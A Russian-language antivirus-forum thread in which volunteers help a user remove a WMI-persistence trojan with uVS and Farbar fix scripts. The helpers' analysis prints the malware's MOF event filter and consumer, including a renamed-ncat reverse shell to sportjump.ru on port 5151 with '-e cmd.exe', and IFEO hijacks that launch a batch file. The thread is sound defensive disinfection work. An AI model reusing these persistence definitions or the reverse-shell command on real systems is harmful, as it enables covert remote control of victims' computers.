[РЕШЕНО] Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a

[hyacins 0]

Здравствуйте! При попытке скачать эксель (видимо, первая ссылка в браузере меня оказалась с подвохом) получила троян со страшным длинным названием. Касперский его обнаружил и предложил удалить, на что я согласилась. Но после он начал присылать мне, что обнаружил и запретил приложение WmiPrvSE.exe. Я провела полную проверку, угроз не обнаружено, но во время неё Касперский каждые 5 минут присылал одно и то же уведомление с обнаружением и запрещением того самого приложения и продолжает до сих пор. Скажите, что делать, пожалуйста..

CollectionLog-2024.04.22-02.39.zip

[safety 83]

1. Добавьте, пожалуйста, логи из журнала обнаружений антивируса Касперского

2.  Подготовьте логи анализа системы при помощи Farbar Recovery Scan Tool.

 

[hyacins 0]

Архив логов их журнала Касперского получается большим, чтобы прикрепить его сюда, поэтому даю ссылку на Яндекс.Диск https://disk.yandex.ru/d/UBNjrE1wT5CJzQ

FRST.txt Addition.txt

[safety 83]

+

Добавьте образ автозапуска системы в uVS.

1. Скачать архив программы можно отсюда:

2. Распакуйте данный архив с программой в отдельный каталог и запустите файл Start.exe
(для Vista, W7, W8, W10, W11 запускаем с правами администратора)
3. В стартовом окне программы - нажмите "запустить под текущим пользователем"
(если текущий пользователь с правами администратора).

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время.txt) автоматически добавится в архив 7z или rar.
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме. Ждем ответ.

[hyacins 0]

DESKTOP-8JNG07M_2024-04-22_10-15-07_v4.15.2.7z

[safety 83]

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню выбираем "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и перезагрузит ее.

Скрипт ниже:
 

;uVS v4.15.2 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAMDATA\CLASSIC.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\NUN.BAT
;------------------------autoscript---------------------------

delall %SystemDrive%\PROGRAMDATA\CLASSIC.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\NUN.BAT
delall %SystemDrive%\PROGRAMDATA\CLASSIC.{BB06C0E4-D293-4F75-8A90-CB05B6477EEE}\NUN.BAT
delref %SystemDrive%\USERS\USER\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\NPDPPLBICNMPOIGIDFDJADAMGFKILAAK\10.8_0\SAVEFROM.NET ПОМОЩНИК
delall %SystemRoot%\TEMP\PMNYYZBELNUA.SYS
apply

deltmp
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref %SystemDrive%\PAPKA\ARC\PLUGINS\ARCPLUGINIE.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemDrive%\PAPKA\ARC\PLUGINS\NPARCPLUGINFF.DLL
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
;-------------------------------------------------------------

restart
czoo

После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату, что с проблемой.

Архив ZOO_дата_время.7z загрузите на облачный диск и дайте ссылку на скачивание в ЛС.

[hyacins 0]

Касперский после перезагрузки системы не присылал уведомление об обнаружении и запрещении приложения (прошло 20 минут с перезагрузки). Сейчас в ЛС отправлю архив

2024-04-22_10-57-42_log.txt

[safety 83]

Возможно было ложное срабатывание на запуск данного файла

C:\PROGRAMDATA\AUX..\SHELLEXT.DLL

 

понаблюдайте некоторое время, возможно сообщение будет выходить с новым периодом.

лог обнаружения угроз  в антивирусе надо переделать.

 он нужен в текстовом формате:

например:

Quote

Сегодня, 28.03.2024 3:50:51        Задача завершена    Задача завершена                                        DESKTOP-K4PNU0M\ASUS    Активный пользователь
Сегодня, 28.03.2024 3:50:51    C:\Program Files\Process Hacker 2\ProcessHacker.exe    Не обработано    Лечение невозможно    not-a-virus:HEUR:RiskTool.Win32.ProcHack.gen    Пропущено    Файл    C:\Program Files\Process Hacker 2    ProcessHacker.exe    Не обработано    Легальная программа, которая может быть использована злоумышленником для нанесения вреда компьютеру или данным пользователя    Низкая    Эвристический анализ    DESKTOP-K4PNU0M\ASUS    Активный пользователь

 

[hyacins 0]

Хорошо, я поняла. Спасибо вам! Я смогу отправить лог после 5 вечера по мск

[hyacins 0]

Добрый вечер. Вот лог обнаружения угроз в текстовом формате.

Лог обнаружения угроз.txt

[safety 83]

Спасибо. Судя по логу последние срабатывания были вчера.

Quote

Сегодня, 22.04.2024 10:56:12    Обнаружен вредоносный объект    WMI Provider Host    WmiPrvSE.exe    C:\Windows\System32\wbem    8040    NT AUTHORITY\СИСТЕМА    Системный пользователь    Обнаружено: PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Обнаружено    PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Троянское приложение    Высокая    Точно    WmiPrvSE.exe    WmiPrvSE.exe    C:\Windows\System32\wbem    Процесс    Поведенческий анализ
Сегодня, 22.04.2024 10:56:12    Запрещено    WMI Provider Host    WmiPrvSE.exe    C:\Windows\System32\wbem    8040    NT AUTHORITY\СИСТЕМА    Системный пользователь    Запрещено: PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Запрещено    PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Троянское приложение    Высокая    Точно    WmiPrvSE.exe    WmiPrvSE.exe   

 

[safety 83]

Есть еще подозрительный объект, который запускается через WMI:

Quote

 

Полное имя                  C:\PROGRAMDATA\NUL..\STARTMENUEXPERIENCEHOST.EXE
Имя файла                   STARTMENUEXPERIENCEHOST.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2024-04-20 22:01 [2021-08-08]
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
WMI_COMMANDLINEEVENTCONSUMER.LIST(CONSUMER_CLASS ~ COMMANDLINEEVENTCONSUMER)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     610D7BD853000
Linker                      14.29
Размер                      322256 байт
Создан                      29.03.2024 в 19:49:18
Изменен                     07.08.2021 в 21:57:21
                            
TimeStamp                   06.08.2021 в 18:13:44
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Оригинальное имя            NCAT.EXE
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Insecure.Com LLC
                            
Доп. информация             на момент обновления списка
SHA1                        8DB3F91ADDB22A506EAD3D0F7B9242A3F6CED640
MD5                         41889943C2AD6880ED7529B3132857A3
                            
Namespace                   \\.\root\subscription
Consumer_Name               nut
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplateC:\ProgramData\NUL..\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe
Filter_Name                 nut
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"nut\"";
    Filter = "__EventFilter.Name=\"nut\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "nut";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "C:\\ProgramData\\NUL..\\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe";
    Name = "nut";
};

                            

 

 

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню выбираем "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и перезагрузит ее.

Скрипт ниже:
 

;uVS v4.15.2 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
zoo %SystemDrive%\PAPKA\LDPLAYER\LDMUTIPLAYER\DNMULTIPLAYEREX.EXE
zoo %SystemDrive%\PAPKA\LDPLAYER\LDPLAYER9\DNPLAYER.EXE
zoo %SystemDrive%\PROGRAMDATA\AUX..\UTSHELLEXT.DLL
zoo %SystemDrive%\PROGRAMDATA\AUX..\SHELLEXT.DLL
zoo %SystemDrive%\PROGRAMDATA\NUL..\STARTMENUEXPERIENCEHOST.EXE
;---------command-block---------
delall %SystemDrive%\PAPKA\LDPLAYER\LDMUTIPLAYER\DNMULTIPLAYEREX.EXE
delall %SystemDrive%\PAPKA\LDPLAYER\LDPLAYER9\DNPLAYER.EXE
delall %SystemDrive%\PROGRAM FILES\LDPLAYER9BOX\LD9BOXSUP.SYS
apply

restart
czoo

После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату, что с проблемой.

Архив ZOO_дата_время.7z загрузите на облачный диск и дайте ссылку на скачивание в ЛС.

Изменено 23 апреля пользователем safety

[thyrex 1 473]

Скачайте по ссылке файл и разархивируйте.

Запустите каждый файл и подтвердите внесение информации в реестр.

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
S2 BITS_bkp; C:\Windows\System32\qmgr.dll [1481216 2024-04-02] (Microsoft Windows -> Microsoft Corporation)
S2 dosvc_bkp; C:\Windows\system32\dosvc.dll [1534464 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\Windows\system32\usosvc.dll [570368 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\Windows\System32\WaaSMedicSvc.dll [427520 2024-04-02] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\Windows\system32\wuaueng.dll [3436544 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
R4 WinRing0_1_2_0; C:\Windows\TEMP\pmnyyzbelnua.sys [14544 2024-04-22] (Noriyuki MIYAZAKI -> OpenLibSys.org) <==== ВНИМАНИЕ
Folder: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
Folder: C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nur\"",Filter="__EventFilter.Name=\"nur\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"pers\"",Filter="__EventFilter.Name=\"pers\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nut\"",Filter="__EventFilter.Name=\"nut\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"per\"",Filter="__EventFilter.Name=\"per\"::
WMI:subscription\__EventFilter->nur::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->nut::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->per::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->pers::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->nur::[CommandLineTemplate => C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat]
WMI:subscription\CommandLineEventConsumer->nut::[CommandLineTemplate => C:\ProgramData\NUL..\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe]
WMI:subscription\CommandLineEventConsumer->per::[CommandLineTemplate => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat]
WMI:subscription\CommandLineEventConsumer->pers::[CommandLineTemplate => C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\utshellext.dll]
BHO-x32: ArcPluginIEBHO Class -> {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} -> C:\papka\Arc\Plugins\ArcPluginIE.dll => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.

После перезагрузки удалите старые и соберите новые логи FRST.txt и Addition.txt.

[hyacins 0]

Касперский после перезагрузки системы не присылал уведомление об обнаружении и запрещении приложения. Сейчас в ЛС отправлю архив

2024-04-23_11-29-14_log.txt

 

И лог-файлы для thyrex

Addition.txt Fixlog.txt FRST.txt

[thyrex 1 473]

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мыши – Копировать)

Start::
CreateRestorePoint:
IFEO\svchost.exe: [GlobalFlag] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
HKLM\...\SilentProcessExit\svchost.exe: [MonitorProcess] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
IFEO\TrustedInstaller.exe: [GlobalFlag] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
HKLM\...\SilentProcessExit\TrustedInstaller.exe: [MonitorProcess] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
Edge HomePage: Default -> hxxps://?
Edge StartupUrls: Default -> "hxxps://?"
2024-04-22 01:38 - 2024-04-22 10:57 - 000000000 _RSHD C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
2024-04-22 01:38 - 2024-04-22 10:57 - 000000000 _RSHD C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
FirewallRules: [{2ca0ac4f-06cc-4485-bd82-74173a5cfbf0}] => (Allow) C:\papka\LDPlayer\LDPlayer9\dnplayer.exe => Нет файла
FirewallRules: [TCP Query User{74F56A9F-9121-4452-9F35-9E1F836672C6}E:\sdi_r2309\sdi_x64_r2309.exe] => (Block) E:\sdi_r2309\sdi_x64_r2309.exe => Нет файла
FirewallRules: [UDP Query User{747D95DB-300C-4331-9811-04E42D22D602}E:\sdi_r2309\sdi_x64_r2309.exe] => (Block) E:\sdi_r2309\sdi_x64_r2309.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

• Обратите внимание: будет выполнена перезагрузка компьютера.